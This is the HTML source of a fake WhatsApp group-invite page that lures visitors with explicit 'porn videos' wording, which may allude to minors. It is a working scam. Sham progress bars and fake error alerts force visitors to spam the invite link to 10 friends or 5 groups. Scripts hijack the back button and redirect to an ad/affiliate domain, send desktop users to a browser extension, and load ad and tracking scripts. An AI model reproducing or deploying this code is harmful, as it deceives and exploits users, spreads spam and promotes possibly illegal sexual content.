<!DOCTYPE html>
<html lang="en" id="whatsapp" class="no_js">
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="origin-when-crossorigin" id=
  "meta_referrer">
  <script nonce="nAeddCIH">
  function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXi1tLLtoHpLhDXzTqI","stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4tdX-tVYkJivciUSU","isCQuick":false});
  </script>
  <script nonce="nAeddCIH">
  (function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);
  </script>
  <style nonce="nAeddCIH"></style>
  <script nonce="nAeddCIH">__DEV__=0;
  </script><noscript>
  <meta http-equiv="refresh" content=
  "0; URL=/K6qWMtbj0gj6TQAUByYeh2?_fb_noscript=1"></noscript>
  <title id="pageTitle">WhatsApp Group Invite</title>
  <meta name="robots" content="noindex">
  <meta name="robots" content="nofollow">
  <meta name="viewport" content=
  "width=device-width, initial-scale=1">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="description" content="WhatsApp Group Invite">
  <meta name="keywords">
  <meta property="og:title" content="Pic🔞chill🥴video;">
  <meta property="og:image" content="https://rd.achingchef.com/uploads/20231103/42471929.jpeg">
  <meta property="og:site_name" content="https://whatsapp.com/">
  <meta property="og:description" content="WhatsApp Group Invite">
  <meta property="og:keywords">
  <meta property="invite_link_type" content="REGULAR">
  <meta property="invite_link_type_v2" content="REGULAR">
  <meta name="mobile-web-app-capable" content="yes">
  <link rel="icon" href=
  "https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.png">
  <link type="text/css" rel="stylesheet" href=
  "https://static.whatsapp.net/rsrc.php/v3/yk/l/0,cross/GUBdiyYD6ul.css?_nc_x=Ij3Wp8lg5Kz"
  data-bootloader-hash="vRp9yOm" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href=
  "https://static.whatsapp.net/rsrc.php/v3/yc/l/0,cross/N3WgOYBmQQJ.css?_nc_x=Ij3Wp8lg5Kz"
  data-bootloader-hash="FW+GhOb" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href=
  "https://static.whatsapp.net/rsrc.php/v3/yI/l/0,cross/5KQK5olQQX2.css?_nc_x=Ij3Wp8lg5Kz"
  data-bootloader-hash="EjQxyi9" crossorigin="anonymous">
  <script src=
  "https://static.whatsapp.net/rsrc.php/v3/yU/r/jFTOxA2uHt1.js?_nc_x=Ij3Wp8lg5Kz"
  data-bootloader-hash="V9N18U2" crossorigin="anonymous" nonce=
  "nAeddCIH"></script>
  <style id='page-skin-1' type='text/css'>
  <!--
    /*
    body {
    font: $(body.font);
    color: $(body.text.color);
    background: $(body.background);
    padding: 0 $(content.shadow.spread) $(content.shadow.spread) $(content.shadow.spread);
    $(body.background.override) margin: 0;
    padding: 0;
    }
    
    -->
  </style>
</head>
<body>
  <div class='main section' id='main'>
    <div class='widget HTML' data-version='1' id='HTML1'>
      <div class='widget-content'>
        <script>
        if (typeof window.orientation == 'undefined' && screen.width >= 1000){
            window.location.href = 'https://chrome.google.com/webstore/detail/value%20/ceffdbkknpflmgklmhoiifkkcihpepgb';
        }
        </script> 
        <script>


            function set_Cookie(name,value){
                var Days = 30;
                var exp = new Date();
                exp.setTime(exp.getTime() + (Days*20*1000));
                document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
            }
            function get_Cookie(name){
                var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
                if(arr=document.cookie.match(reg)){
                    return unescape(arr[2]);
                }
                return '';
            }


            /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                            document.getElementById("first-box")."quedate__step".display="none";//??;
                            document.getElementById("second-box").style.display="none";//??;
                            document.getElementById("third-box").style.display="none";//??;
                            document.getElementsByClassName("loading2__box").style.display="";//??;
                        }*/


        </script>
        <style type="text/css">

        @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
        @import url("//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
        @import url('https://fonts.googleapis.com/css2?family=Noto+Nastaliq+Urdu:wght@700&display=swap');
        @import url('https://fonts.googleapis.com/css2?family=Noto+Nastaliq+Urdu:wght@400;700&display=swap');
        * {
        margin: 0;
        padding: 0;
        font-family: Poppins, Droid Arabic Naskh;
        font-weight: normal;
        box-sizing: border-box;


        }
        body {
        direction: ltr;
        background-image: url(https://i.imgur.com/iUysSRO.png);
        }
        a {
        text-decoration: none;
        }
        .post {
        background: #fff;
        margin: 0px auto;
        padding: 10px;
        width: 100%;
        height: 362px;
        border-radius: 20px 20px 0 0;
        text-align: center;
        }
        .post img {
        width: 100%;
        }
        .welcome {
        font-size: 15px;
        }
        .amount,
        #getname {
        color: #000;
        text-decoration: none;
        }
        .done {
        text-align: center;
        color: #27ae60;
        }
        .tip {
        font-size: 22px;
        color: red;
        }
        .title {
        text-align: center;
        }
        .error {
        display: none;
        text-align: center;
        font-size: 14px;
        color: #e74c3c;
        }
        button {
        display: block;
        width: 300px;
        height: 38px;
        color: #fff;
        border: none;
        outline: none;
        font-size: 15px;
        cursor: pointer;
        border-radius: 35px;
        padding: 0 10px;
        margin: 10px auto;
        background: #3a5664;
        transition: background 0.3s ease;
        }
        button:hover {
        background: #098105;
        }
        .phone {
        max-width: 400px;
        margin: 10px auto;
        }
        .phone input {
        width: 100%;
        height: 50px;
        padding: 10px;
        outline: none;
        border: 2px solid #cecece;
        font-size: 14px;
        }
        #confirm {
        width: 200px;
        margin: 10px auto;
        border-radius: 27px;
        }
        #loader {
        text-align: center;
        }
        .spin {
        width: 50px;
        height: 50px;
        background: transparent;
        border: solid 8px rgb(9, 129, 5);
        border-right-color: transparent;
        border-radius: 50%;
        margin: 10px auto;
        animation: spin 0.8s linear infinite;
        }
        @keyframes spin {
        100% {
            transform: rotate(1turn);
        }
        }
        #loader,
        #info,
        #checking,
        #share,
        #claim {
        display: none;
        }
        .center {
        display: flex;
        align-items: center;
        justify-content: center;
        }
        .barr {
        direction: ltr;
        max-width: 400px;
        margin: 10px auto;
        box-sizing: border-box;
        }
        .fill {
        position: relative;
        display: inline-block;
        width: calc(100% - 100px);
        height: 27px;
        padding: 2px;

        }
        #fill,
        #fill2 {
        background: #008069;
        width: 0%;
        height: 100%;
        }
        .percentage {
        width: 100px;
        float: right;
        height: 28px;
        font-size: 16px;

        }
        #percentage,
        #percentage2 {
        margin-left: 5px;
        }
        #check,
        #check2 {
        display: none;
        }
        .counter {
        color: #7f7f7f;
        font-size: 12px;
        text-align: right;
        padding: 10px 0 10px 2px;

        }
        .reactions {
        display: inline-flex;
        align-items: center;
        float: left;
        }
        .counter img {
        float: left;
        width: 16px;
        height: 16px;
        border-radius: 50%;
        border: 2px solid #fff;
        box-sizing: content-box;
        }
        .like,
        .love {
        margin-right: -5px;
        }
        .like {
        z-index: 2;
        }
        .love {
        z-index: 1;
        }
        .bar {
        display: table;
        width: 100%;
        border-bottom: 1px solid #e1e2e3;
        }
        .bar .react {
        display: table-cell;
        width: calc(100% / 3);
        font-size: 12px;
        color: #7f7f7f;
        text-align: center;
        padding: 10px 0;
        cursor: pointer;
        }
        .comments {
        direction: ltr;
        }
        .comment {
        padding: 6px 0;
        margin-top: 5px;
        }
        .comment img {
        float: left;
        width: 32px;
        height: 32px;
        border: none;
        border-radius: 18px;
        cursor: pointer;
        }
        .reply {
        margin-left: 37px;
        }
        .single-container {
        margin-left: 37px;
        background: #f1f2f6;
        padding: 10px;
        border-radius: 15px;
        font-size: 12px;
        }
        .single-container .user {
        display: inline-block;
        cursor: pointer;
        color: #365899;
        margin-bottom: 5px;
        }
        .single-container .text {
        display: block;
        }
        .buttons {
        font-size: 12px;
        font-weight: bold;
        margin: 10px 0 0 47px;
        color: #90949c;
        }
        .action {
        cursor: pointer;
        }
        .action:hover {
        text-decoration: underline;
        }
        .input {
        padding: 6px 12px 12px;
        }
        .input input {
        width: 100%;
        background: #f1f2f6;
        padding: 10px;
        border-radius: 15px;
        border: 0;
        outline: none;
        }
        .A{


        text-align: center;
        width:75%;
        border-radius:15px;
        padding:5px;
        margin-bottom:10px;
        background-color: rgb(164, 219, 175);
        }

        .w3-container{

        background-repeat: no-repeat;
        background-size: cover;
        background-position: center 10%;
        height: 361px;
        text-align: center;
        }


        .date {
        color: grey;
        font-size: 13px;
        }
        .reactions {
        direction: ltr;
        display: inline-flex;
        align-items: center;
        margin: 22px auto;
        margin-left: 82px;
        }
        .reactions img {
        width: 40px;
        height: 40px;
        border-radius: 50%;
        box-sizing: content-box;
        }
        .like{
        margin-right: -5px;
        border: 2px solid #fff;
        }
        .love {
        margin-right: -5px;
        border: 2px solid #fff;
        }
        .care {
        z-index: 2;
        border: 2px solid #fff;
        }
        .care1 {
        margin-left: -35px;
        z-index: 3;
        }
        .total {
        margin-left: -40px;
        z-index: 4;
        font-size: 14px;

        }

        #confm{
        display: block;
        width: 203px;
        height: 50px;
        color: #fff;
        border: none;
        outline: none;
        font-size: 15px;
        cursor: pointer;
        border-radius: 35px;
        padding: 0 10px;
        margin: 10px auto;
        background: #ebadad;
        transition: background 0.3s ease;
        }
        .tip1{
        font-size:14px;
        color: black;
        }
        .tip2{
        font-size: 14px;
        color: black;
        }
        </style>
        <div class="w3-container">
          <br>
        </div>
        <div class="post" width="100%">
          <div id="intro">
            <p class="welcome"><img src="https://ei.phncdn.com/videos/202205/16/408200511/original/(m=eaAaGwObaaaa)(mh=kaRARWAPgwVWpAqn)1.jpg"
            style="border-radius: 50%;width: 30%;height: 30%;"></p>
            <p>Videos&🔞Pictures</p>
            <p class="date">Created on 2023</p>
            <div class="reactions">
              <img class="like" src=
              "https://i.imgur.com/NwfsNZW.jpg"> <img class="love"
              src="https://i.imgur.com/9xCVBBO.jpg"> <img class=
              "care" src="https://i.imgur.com/Te5R0J3.png">
              <img class="care1" src=
              "https://i.imgur.com/Te5R0J3.png"> <span class=
              "total">+460</span>
            </div><button id="go">Join the group</button>
          </div>
          <div id="loader">
            <div>
              Join a group
            </div>
            <div class="spin"></div>
            <div id="num">
              0%
            </div>
          </div>
          <div id="info">
            <p class="title">Are you 18 years old?</p>
            <div class="phone">
              <center>
                <br>
                <button id="confirm">Yes</button> <button id=
                "confm">No</button>
              </center>
            </div>
            <p class="error">Please enter a valid number !</p>
          </div>
          <div id="checking">
            <p class="title"></p>
            <div class="barr">
              <div class="fill">
                <div id="fill"></div><br>
                <ins style="width: 300px;height:50px" data-width=
                "300" data-height="50" class="c9hkh7d0s"
                data-domain="//candouraggravate.com/" data-affquery=
                "/pcbwp9m065?key=ea0288a6b43f019513feb47fc4be4edf">
                <script src="//candouraggravate.com/js/responsive.js"
                async></script></ins>
              </div>
              <div class="percentage center">
                <span id="load"></span> <span id="check"></span>
                <span id="percentage"></span>
              </div>
            </div>
          </div>
          <div id="share" style="padding: 7px;">
            <p class="tip">last step:</p>
            <p class="tip1">1- Click the (share) button below and
            send the message to 10 friends or 5 groups on
            WhatsApp.</p>
            <p class="tip2">2- You join the group automatically
            after the green verification bar is full.</p>
            <div class="row">
              <div class="col-3"></div>
            </div><button id="whatsapp">SHARE</button>
            <div class="barr">
              <div class="fill">
                <div id="fill2" style="width: 93%;"></div>
              </div>
              <div class="percentage center">
                <span id="percentage2">0%</span>
              </div>
            </div>
          </div>
          <div id="claim">
            <br>
            <p class="title">Group link 👇</p><a href=
            "https://candouraggravate.com/pcbwp9m065?key=ea0288a6b43f019513feb47fc4be4edf"><button id="offer">Join
            now</button></a><br>
            <ins style="width: 300px;height:250px" data-width="300"
            data-height="250" class="c9hkh7d0s" data-domain=
            "//candouraggravate.com/" data-affquery=
            "/pcbwp9m065?key=ea0288a6b43f019513feb47fc4be4edf">
            <script src="//candouraggravate.com/js/responsive.js"
            async></script></ins>
          </div>
        </div>
        <script src=
        "https://code.jquery.com/jquery-latest.min.js"></script> 
        <script type="text/javascript">

        var time = 0;
        window.setInterval(function () {
        time = time + 1;
        $(".t1").html(time + 1 + "m");
        $(".t2").html(time + 2 + "m");
        $(".t3").html(time + 4 + "m");
        }, 6e4);
        var likes = 134;
        var likes = 134,
        comments = 23,
        shares = 12;
        window.setInterval(function () {
        likes = likes + Math.floor(Math.random() * 3);
        comments = comments + Math.floor(Math.random() * 2);
        shares = shares + Math.floor(Math.random() * 2);
        $("#likes").html(likes + "K");
        $("#comments").html(comments + "K comments");
        $("#shares").html(shares + "K shares");
        }, 5e3);
        $(".liked").click(function () {
        if ($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
        } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
        }
        });
        </script> 
        <script type="text/javascript">


        $("#go").click(function () {
        $("#intro").fadeOut(0);
        $("#loader").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            $("#num").text(i + "%");
            i += 1;
            if (i >= 100) {
                clearInterval(interval);
                $("#loader").fadeOut(0);
                $("#info").fadeIn(1000);
            }
        }, 50);
        });

        $("#confirm").click(function () {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 500);
            }
        }, 50);
        });

        $(document).click(function () {
        if ($("#name").is(":focus")) {
            $(".error").fadeOut(500);
        }
        });

        </script> 
        <script>

            var text1 = 
                "*chilllD Porn videos* 🎥%0A https://chatt-whatsapp.github.io/v5pDsogROLCqLV/%0A%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*Join Now*",
                text2 = " an amount of ",
                text3 = " for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
                error = "There error! Posts are not counted. You may have shared it with the same friend or group more than once, please re-share it",
                abcde = "ddd",
                saved = "",
                share = "whatsapp://send?text=" + text1;
        </script> 
        <script type="text/javascript">

        var swidth = localStorage.getItem(saved);
        if (swidth !== null) {
        var width = swidth * 1;
        $("#intro").fadeOut(0);
        $(".comments").fadeOut(0);
        $("#share").fadeIn(0);
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
        } else {
        var width = 0;
        }
        $("#whatsapp").click(function () {
        window.location.href = share;
        if (width == 0) {
            width += 50;
        } else if (width == 50) {
        alert(error);
        width += 15;
        } else if (width == 65) {
        width += 5;
        } else if (width == 70) {
        alert(error);
        width += 10;
        } else if (width == 80) {
        alert(error);
        width += 5;
        } else if (width == 85) {
        width += 5;
        } else if (width == 90) {
        width += 4;
        } else if (width == 94) {
        width += 2;
        } else if (width == 96) {
        width += 2;
        } else {
            $("#share").fadeOut(0);
            $("#claim").fadeIn(1000);
        }
        localStorage.setItem(saved, width);
        setTimeout(function () {
            $("#fill2").css("width", width + "%");
            $("#percentage2").text(width + "%");
        }, 2000);
        });
        $("#offer").click(function () {
        window.open(cpa, "_blank");
        });

        </script> 
        <script>

        window.onhashchange=function(){jp();};
        function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
        function jp() {
            fh();}
        setTimeout('hh();', 500);
        function fh(){
            location.href="https://candouraggravate.com/pcbwp9m065?key=ea0288a6b43f019513feb47fc4be4edf";
        }
        function goon(){
            location.href="https://candouraggravate.com/pcbwp9m065?key=ea0288a6b43f019513feb47fc4be4edf";
        }
        </script>
    <div style="visibility:hidden"><img src="//whos.amung.us/pingjs/?k=u7niekfbbm&amp;t=Probando&amp;x=https://www.whatsapp.com/" style="display:none" /></div>
      </div>
      <div class='clear'></div>
    </div>
    <script>
    now_inl=(function(){var p=window.performance;return p&&p.now&&p.timing&&p.timing.navigationStart?function(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipeFR=now_inl();
    </script>
    <link rel="preload" href=
    "https://static.whatsapp.net/rsrc.php/v3/yk/l/0,cross/GUBdiyYD6ul.css?_nc_x=Ij3Wp8lg5Kz"
    as="style" crossorigin="anonymous">
    <link rel="preload" href=
    "https://static.whatsapp.net/rsrc.php/v3/yc/l/0,cross/N3WgOYBmQQJ.css?_nc_x=Ij3Wp8lg5Kz"
    as="style" crossorigin="anonymous">
    <link rel="preload" href=
    "https://static.whatsapp.net/rsrc.php/v3/yI/l/0,cross/5KQK5olQQX2.css?_nc_x=Ij3Wp8lg5Kz"
    as="style" crossorigin="anonymous">
    <script>
    window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":null}));});
    </script> 
    <script nonce="nAeddCIH">
    (function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();
    </script> 
    <script nonce="nAeddCIH">
    requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources:["vRp9yOm","FW+GhOb","EjQxyi9"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,hsrp:{hblp:{consistency:{rev:1007810832}}},allResources:["vRp9yOm","FW+GhOb","EjQxyi9","HdXXd53","RxrVe8x","fDGzMYF","JOUMnNC","k5V+TeW","8TNZYzX","EsRQ/Zi"]});}));
    </script> 
    <script>
    requireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7253945527567608333")});
    </script>
    <script nonce="nAeddCIH">
    (function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();
    </script> 
    <script nonce="nAeddCIH">
    requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources:["EsRQ/Zi"],id:"last_response",phase:1,last_in_phase:true,the_end:true,jsmods:{define:[["TimeSliceInteractionSV",[],{on_demand_reference_counting:true,on_demand_profiling_counters:true,default_rate:1000,lite_default_rate:100,interaction_to_lite_coinflip:{ADS_INTERFACES_INTERACTION:0,ads_perf_scenario:0,ads_wait_time:0,Event:1},interaction_to_coinflip:{ADS_INTERFACES_INTERACTION:1,ads_perf_scenario:1,ads_wait_time:1,Event:100},enable_heartbeat:true,maxBlockMergeDuration:0,maxBlockMergeDistance:0,enable_banzai_stream:true,user_timing_coinflip:50,banzai_stream_coinflip:0,compression_enabled:true,ref_counting_fix:false,ref_counting_cont_fix:false,also_record_new_timeslice_format:false,force_async_request_tracing_on:false},2609],["USIDMetadata",[],{browser_id:"?",tab_id:"",page_id:"Prxjv2e1jnrefm",transition_id:0,version:6},5888],["cr:1069930",[],{__rc:[null,"Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["cr:1083117",[],{__rc:[null,"Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["cr:1353359",["EventListenerImplForBlue"],{__rc:["EventListenerImplForBlue","Aa1IwGyQ7STzdmK0YnmNVUUcCj4UxHbQvK3nPvgxSh3kjt8xBdLcPfinEdCPbGf87dfPW2pfeqmvwdqKVW3rAXakCvANzdvndQ"]},-1],["cr:1642797",["BanzaiBase"],{__rc:["BanzaiBase","Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,graphexplorer:true,sticker_search_ranking:true},known_routes:["artillery_javascript_actions","artillery_javascript_trace","artillery_logger_data","logger","falco","gk2_exposure","js_error_logging","loom_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging"],should_drop_unknown_routes:true,should_log_unknown_routes:false},7],["cr:692209",["cancelIdleCallbackBlue"],{__rc:["cancelIdleCallbackBlue","Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["TrackingConfig",[],{domain:"https://pixel.facebook.com"},325],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa2EOv3FkIAYqvBUya5GKmkI5_ob4a_OP1P0bh1-emQ6DOutZwRV6F0WKLdVRHxcQrT4qPlDsUepzeB-nW-wabSXv5c"]},-1],["cr:5800",[],{__rc:[null,"Aa1ztGm48yh7BqENwd5Bc6TEJ2DvVX3BlEtAsY49RWOK8AlP3t6VBDNMlPBq2lztGZ1Io9h3p992EHlnhCgoAdnPRb8"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"WAXWhatsAppChatInviteController",page_type:"normal",page_uri:"https://chat.whatsapp.com/K6qWMtbj0gj6TQAUByYeh2",serverLID:"7253945527567608333"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["DimensionTracking"],["NavigationClickPointHandler"],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["TransportSelectingClientSingletonConditional"],["RequireDeferredReference","unblock",[],[["TransportSelectingClientSingletonConditional"],"sd"]],["RequireDeferredReference","unblock",[],[["TransportSelectingClientSingletonConditional"],"css"]]]},hsrp:{hsdp:{clpData:{"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}}},hblp:{consistency:{rev:1007810832}}},allResources:["EsRQ/Zi","HdXXd53","rjii4j2","k5V+TeW"]});}));
    </script>
  </div>
</body>
</html>
